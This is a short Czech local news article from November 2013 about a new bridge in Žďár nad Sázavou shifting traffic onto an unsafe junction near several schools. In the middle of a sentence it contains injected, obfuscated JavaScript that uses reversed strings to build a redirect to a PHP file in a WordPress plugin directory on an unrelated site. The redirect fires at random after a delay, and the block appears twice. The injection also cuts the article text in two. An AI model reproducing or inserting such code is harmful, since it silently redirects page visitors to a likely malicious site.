Žďár nad Sázavou, zdar nad sazavou, aktuality
Rainbow page separator

Zprovoznění mostu zvýší dopravní ruch o kus dál

Úterý, 26. listopadu 2013

Žďár nad Sázavou / Most z Dolní ulice na Klafar, jenž bude zprovozněn 1. prosince, s sebou podle předpokladů přinese snížení množství aut, která projedou přes centrum města, ale zároveň i zvýšený nápor na křižovatku ulic Revoluční – Okružní – Komenského – Libická na rozhraní čtvrtí Stalingrad a Klafar. Na té[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to křižovatce dosud není bezpečný přechod, ačkoliv se v její blízkosti nachází několik škol.
Podle zástupců žďárské radnice se budou příslušná opatření, případně i zřízení přechodu pro větší bezpečnost chodců navrhovat až na základě vyhodnocení dopravní situace v inkriminovaném místě po spuštění provozu na přemostění.
Co se týče nových přechodů pro chodce, obyvatelé Žďáru se na jaře dočkají přechodu přes ulici 1. máje v křížení s ulicí Veselskou, možnosti zklidnění provozu se na základě požadavků veřejnosti řeší i v ulici Okružní-dolní.